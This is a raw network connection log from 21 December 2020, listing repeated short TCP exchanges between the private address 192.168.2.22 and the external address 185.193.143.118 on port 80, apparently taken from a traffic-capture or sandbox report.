Dec 21, 2020 08:34:08.962574959 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.962620974 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.021821976 CET	80	49239	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.169126987 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.226891041 CET	80	49240	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.227003098 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.232918024 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.291044950 CET	80	49240	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.291323900 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.349097013 CET	80	49240	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.421864033 CET	80	49240	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.421973944 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.422018051 CET	49240	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.479794025 CET	80	49240	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.614814997 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.679244041 CET	80	49241	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.679363966 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.685127020 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.749536991 CET	80	49241	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.749680996 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.814219952 CET	80	49241	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.882205009 CET	80	49241	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:09.882339001 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.882395029 CET	49241	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:09.946927071 CET	80	49241	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.084872961 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.146028042 CET	80	49242	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.146153927 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.151638985 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.212908030 CET	80	49242	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.213010073 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.274137974 CET	80	49242	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.347270966 CET	80	49242	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.347421885 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.347464085 CET	49242	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.408366919 CET	80	49242	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.542756081 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.601942062 CET	80	49243	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.602112055 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.607949018 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.667222977 CET	80	49243	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.667370081 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.726835012 CET	80	49243	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.794915915 CET	80	49243	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.795073986 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.795115948 CET	49243	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:10.854909897 CET	80	49243	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:10.975591898 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.041472912 CET	80	49244	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.041557074 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.045496941 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.110730886 CET	80	49244	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.110836983 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.176033974 CET	80	49244	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.244723082 CET	80	49244	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.244893074 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.244935989 CET	49244	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.310300112 CET	80	49244	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.437899113 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.495124102 CET	80	49245	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.495296955 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.501199007 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.558188915 CET	80	49245	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.558350086 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.615231991 CET	80	49245	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.678663969 CET	80	49245	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.678838015 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.678900003 CET	49245	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.735605955 CET	80	49245	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.868766069 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.932594061 CET	80	49246	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:11.932719946 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.935915947 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:11.999849081 CET	80	49246	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.000009060 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.063874006 CET	80	49246	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.130192995 CET	80	49246	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.130386114 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.130404949 CET	49246	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.194273949 CET	80	49246	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.344598055 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.403877974 CET	80	49247	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.404031038 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.410320997 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.469507933 CET	80	49247	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.469660997 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.528784037 CET	80	49247	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.596600056 CET	80	49247	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.596863031 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.596916914 CET	49247	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.656006098 CET	80	49247	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.795551062 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.852947950 CET	80	49248	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.853131056 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.859761000 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.916850090 CET	80	49248	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:12.917004108 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:12.976584911 CET	80	49248	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:13.045886040 CET	80	49248	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:13.046051979 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:13.046109915 CET	49248	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:13.104296923 CET	80	49248	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.227386951 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.285180092 CET	80	49249	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.285327911 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.289894104 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.347301006 CET	80	49249	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.347448111 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.405045986 CET	80	49249	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.471556902 CET	80	49249	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.471772909 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.471826077 CET	49249	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.529066086 CET	80	49249	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.658473015 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.717560053 CET	80	49250	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.717694044 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.721699953 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.780617952 CET	80	49250	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.780733109 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.839587927 CET	80	49250	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.909936905 CET	80	49250	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:15.910037041 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.910080910 CET	49250	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:15.970454931 CET	80	49250	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.100945950 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.162878990 CET	80	49251	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.162974119 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.167680979 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.230201960 CET	80	49251	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.230355024 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.292254925 CET	80	49251	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.356204033 CET	80	49251	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.356312037 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.356384039 CET	49251	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.418337107 CET	80	49251	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.549113035 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.606664896 CET	80	49252	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.606797934 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.612814903 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.670088053 CET	80	49252	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.670310020 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.727562904 CET	80	49252	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.795536041 CET	80	49252	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.795670986 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.795718908 CET	49252	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:16.853192091 CET	80	49252	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:16.992711067 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.049952984 CET	80	49253	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.050071001 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.056103945 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.113053083 CET	80	49253	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.113158941 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.169872046 CET	80	49253	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.290443897 CET	80	49253	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.290544987 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.290585041 CET	49253	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.347438097 CET	80	49253	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.484319925 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.547399998 CET	80	49254	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.547514915 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.553276062 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.616349936 CET	80	49254	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.616457939 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.679366112 CET	80	49254	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.746176958 CET	80	49254	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.746298075 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.746365070 CET	49254	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:17.809516907 CET	80	49254	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:17.948550940 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.006931067 CET	80	49255	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.007025957 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.009480953 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.067688942 CET	80	49255	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.067792892 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.126072884 CET	80	49255	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.197958946 CET	80	49255	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.198175907 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.198249102 CET	49255	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.256438971 CET	80	49255	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.386682034 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.448466063 CET	80	49256	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.449754953 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.454350948 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.515705109 CET	80	49256	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.515912056 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.577199936 CET	80	49256	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.645733118 CET	80	49256	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.645895958 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.645914078 CET	49256	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.707284927 CET	80	49256	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.849792957 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.909744978 CET	80	49257	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.909863949 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.916194916 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:18.975989103 CET	80	49257	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:18.976077080 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.035933971 CET	80	49257	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.103234053 CET	80	49257	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.103377104 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.103421926 CET	49257	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.163410902 CET	80	49257	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.297555923 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.354763031 CET	80	49258	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.354883909 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.360780001 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.417990923 CET	80	49258	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.418118954 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.475209951 CET	80	49258	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.537756920 CET	80	49258	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.537915945 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.537970066 CET	49258	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.595294952 CET	80	49258	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.741467953 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.804562092 CET	80	49259	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.804683924 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.810534000 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.873605967 CET	80	49259	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:19.873673916 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:19.936486959 CET	80	49259	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.007169008 CET	80	49259	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.007297039 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.007342100 CET	49259	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.070718050 CET	80	49259	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.203917027 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.262801886 CET	80	49260	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.262939930 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.265619993 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.324022055 CET	80	49260	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.324187994 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.382360935 CET	80	49260	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.447706938 CET	80	49260	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.447880030 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.447943926 CET	49260	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.506072044 CET	80	49260	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.650490999 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.712325096 CET	80	49261	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.712428093 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.716352940 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.778075933 CET	80	49261	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.778178930 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.839812040 CET	80	49261	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.916419983 CET	80	49261	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:20.916510105 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.916534901 CET	49261	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:20.977865934 CET	80	49261	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.096206903 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.155699968 CET	80	49262	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.155884027 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.162199020 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.221626997 CET	80	49262	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.221807003 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.281107903 CET	80	49262	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.349723101 CET	80	49262	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.349899054 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.349957943 CET	49262	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.409367085 CET	80	49262	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.547983885 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.610995054 CET	80	49263	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.611125946 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.617247105 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.680143118 CET	80	49263	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.680282116 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.743339062 CET	80	49263	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.806761026 CET	80	49263	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.807476997 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.807503939 CET	49263	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:21.872209072 CET	80	49263	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:21.985333920 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.043700933 CET	80	49264	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.043802023 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.049658060 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.107974052 CET	80	49264	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.108139038 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.166466951 CET	80	49264	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.237977028 CET	80	49264	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.238073111 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.238136053 CET	49264	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.296394110 CET	80	49264	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.437271118 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.494618893 CET	80	49265	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.494688988 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.498814106 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.555902004 CET	80	49265	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.555979967 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.613037109 CET	80	49265	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.684315920 CET	80	49265	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.684412003 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.684458971 CET	49265	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.741617918 CET	80	49265	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.875936985 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.933595896 CET	80	49266	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.933705091 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.936532021 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:22.993962049 CET	80	49266	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:22.994043112 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.051435947 CET	80	49266	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.116628885 CET	80	49266	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.116736889 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.116772890 CET	49266	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.175925970 CET	80	49266	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.311585903 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.374829054 CET	80	49267	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.374957085 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.377784014 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.441063881 CET	80	49267	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.441164017 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.504234076 CET	80	49267	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.570331097 CET	80	49267	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.570450068 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.570504904 CET	49267	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.633505106 CET	80	49267	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.767261028 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.830543041 CET	80	49268	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.830635071 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.832814932 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.895478964 CET	80	49268	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:23.895550966 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:23.958293915 CET	80	49268	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.179902077 CET	80	49268	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.180080891 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.180123091 CET	49268	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.242928982 CET	80	49268	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.375555038 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.433954000 CET	80	49269	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.434046030 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.436786890 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.495167971 CET	80	49269	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.495271921 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.553680897 CET	80	49269	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.625037909 CET	80	49269	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.625125885 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.625186920 CET	49269	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.683454990 CET	80	49269	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.836791992 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.895665884 CET	80	49270	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.895737886 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.899039984 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:24.957952023 CET	80	49270	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:24.958028078 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.016665936 CET	80	49270	185.193.143.118	192.168.2.22
